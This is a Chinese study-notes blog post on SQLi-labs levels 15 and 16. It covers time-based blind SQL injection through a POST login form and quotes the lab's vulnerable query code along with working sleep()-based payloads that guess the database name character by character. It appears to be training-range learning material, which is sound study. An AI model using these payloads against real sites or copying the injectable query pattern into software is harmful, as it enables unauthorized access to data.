Sqli-labs Less15-16 布尔-延时型sql盲注 - POST

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Less - 15: POST - Blind - Booliant/time Based - Single Quotes##

  1. 测试漏洞

    本馆没有错误提示,利用延时注入

    源代码中

     @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
    

    使用了 ‘uname’ 进行处理

  2. 利用延时注入猜数据库

     post数据:
     uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
    
     # 或者 
    
     uname=admin'and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit
    
     # 数据库的第一位是 s
    

    正确的时候可以直接登录,不正确的时候延时 5 秒。

Less - 16: POST - Blind - Booliant/time Based - Double Quotes##

  1. 测试漏洞

    本馆没有错误提示,利用延时注入

    源代码中

     $uname='"'.$uname.'"';
     $passwd='"'.$passwd.'"';
     @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    

    使用了 ("") 进行处理

  2. 利用延时注入猜数据库

     post数据:
     uname=admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit
    
     # 或者 
    
     uname=admin")and If(left(database(),1)='s',1,sleep(5))#&passwd=11&submit=Submit
    
     # 数据库的第一位是 s
    

    正确的时候可以直接登录,不正确的时候延时 5 秒。

你可能感兴趣的:(web安全)